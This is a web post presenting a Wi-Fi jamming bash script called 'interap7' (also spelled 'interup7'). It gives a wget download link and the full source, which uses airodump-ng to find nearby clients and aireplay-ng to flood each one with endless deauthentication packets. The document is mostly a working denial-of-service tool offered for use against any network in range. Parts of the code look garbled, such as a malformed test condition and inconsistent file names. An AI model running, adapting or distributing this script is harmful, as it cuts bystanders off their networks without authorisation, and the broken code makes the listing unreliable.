interup7 is a script that uses the aircrack-ng package for repeated deauthentication packets sending, this cause all the clients to be disconnected from the AP. Another thing that the script does, is to obtain information about the APs and the client around the attacker and puts it into useful data. In addition there is an option to set time for the script to run.
To get the script you can use:
wget http://hackingdefined.org/tools/interap7.sh
Source is also available here:
#!/bin/bash clear echo " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo " .__.................__......................_._........." echo " / _\.___..___....../ _\.___..___._..._._.__(_) |_._..._." echo " \ \./ _ \/ _ \_____\ \./ _ \/ __| |.| | '__| | __| |.| |" echo " _\ \ __/ __/_____|\ \ __/ (__| |_| | |..| | |_| |_| |" echo " \__/\___|\___|.....\__/\___|\___|\__,_|_|..|_|\__|\__, |" echo " ..................................................|___/." echo "" echo " Wifi Jamming 0.1 " echo "" echo " Created By Tom Zahov (tomas7470)" echo " and" echo " Yuval (tisf) Nativ from See-Security" echo " yuval@see-security.com" echo " http://www.see-security.com" echo " https://avtacha.wordpress.com" echo "" echo " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo "" scriptname="interap7.sh" # Checks if this file is being ran as root. if [ x"`which id 2> /dev/null`" != "x" ]; then USERID="`id -u 2> /dev/null`" fi if [ x$USERID = "x" -a x$UID != "x" ]; then USERID=$UID fi if [ x$USERID != "x" -a x$USERID != "x0" ]; then #Guess not echo Run it as root ; exit ; fi # Changes working directory to the same as this file DIR="$( cd "$( dirname "$0" )" && pwd )" cd $DIR # Sets first command line VAR WIFIVAR="$1" #Checks if user specified a WIFI card if [ x"$WIFIVAR" = x"" ]; then echo "" echo "No wifi card specified, scanning for available cards (doesnt always work)" USWC="no" else echo "Using user specified wifi card ""$WIFIVAR" USWC="yes" fi if [ x"$USWC" = x"no" ]; then # Uses Airmon-ng to scan for available wifi cards. airmon-ng|cut -b 1,2,3,4,5,6,7 > clist01 count=0 fi if [ -a "clist" ]; then rm clist cat clist01 |while read LINE ; do if [ $count wifijammer_0.1 ]; then echo "$LINE" | cut -b 1-7 | tr -d [:space:] >> clist count=$((count+1)) else count=$((count+1)) fi done rm clist01 WIFI=`cat clist` echo "Using first available Wifi card: `airmon-ng|grep "$WIFI"`" echo "If you would like to specify your own card please do so at the command line" echo "etc: sudo ./$scriptname wlan0" rm clist else WIFI="$WIFIVAR" fi if [ x"$WIFI" = x"" ]; then #Guess no wifi card was detected echo "No wifi card detected." echo "" echo "Please Specify network card. Quitting" echo " etc: sudo ./$scriptname wlan0" echo "" exit fi # Start the wireless interface in monitor mode if [ x"$airmoncard" != x"1" ]; then airmon-ng start $WIFI >tempairmonoutput airmoncard="1" fi # Check for monitor mode if [ x"$testcommandvar02" = x"" ]; then WIFI02=`cat tempairmonoutput|grep "monitor mode enabled on" |cut -b 30-40 | tr -d [:space:] |tr -d ")"` if [ x$WIFI02 = x ]; then WIFI02=`cat tempairmonoutput|grep "monitor mode enabled" |cut -b 1-5 | tr -d [:space:]` fi WIFI="$WIFI02" rm tempairmonoutput fi #echo "$WIFI" read -p "Please specify scan Time (in Seconds), or type '0' (without quotes) to run with no time limit: " Scan_Time #If User limit time. if [ "$Scan_Time" = 0 ]; then read -p "Please specify a channel to jam, or type in 'scan' (without quotes) to see airodump's: " NUMBER else read -p "Please specify a channel to jam, or type in 'scan' (without quotes) to see airodump's output for $Scan_Time seconds: " NUMBER fi # If something was entered that was not "scan" then assume its a number and continue if [ x"$NUMBER" != x"scan" ]; then CHANNEL="$NUMBER" else # scan was entered, so start airodump-ng in channel hopping mode to scan the area airodump-ng $WIFI & SCANPID=$! sleep $Scan_Time kill $SCANPID sleep 1s # Asks user to specify a channel read -p "Please specify a channel to jam: " NUMBER CHANNEL="$NUMBER" fi # Launches airodump-ng on specified channel to start gathering a client list rm *.csv xterm -fn fixed -geom -0-0 -title "Scanning specified channel" -e "airodump-ng -c $NUMBER -w airodumpoutput $WIFI" 2>/dev/null & # Removes temp files that are no longer needed rm *.cap 2>/dev/null rm *.kismet.csv 2>/dev/null rm *.netxml 2>/dev/null # Makes a folder that will be needed later mkdir stationlist 2>/dev/null rm stationlist/*.txt if [ $Scan_Time != 0 ]; then TOMAS=$$ xterm -fn fixed -geom -0-0 -title "Time To Run" -e "sleep $Scan_Time; kill $TOMAS; killall xterm" 2>/dev/null & fi # Start a loop so new clients can be added to the jamming list while [ x1 ];do sleep 5s # Takes appart the list of clients and reorganizes it in to something useful cat airodumpoutput*.csv|while read LINE01 ; do echo "$LINE01" > tempLINE01 LINE=`echo $LINE01|cut -f 1 -d ,|tr -d [:space:]` rm tempLINE01 # Ignores any blank if [ x"$LINE" != x"" ]; then if [ x"$LINE" = x"StationMAC" ]; then start="no" fi if [ x"$start" = x"yes" ]; then if [ -e stationlist/"$LINE".txt ]; then echo "" 2>/dev/null else echo "Client Found: $LINE" # Lauches new window with de-authenticate thingy doing it's thing xterm -fn fixed -geom -0-0 -title "Jamming $LINE" -e "aireplay-ng –deauth 0 -a $LINE $WIFI" & echo "$LINE" > stationlist/$LINE.txt fi fi if [ x"$LINE" = x"BSSID" ]; then start="yes" fi fi done done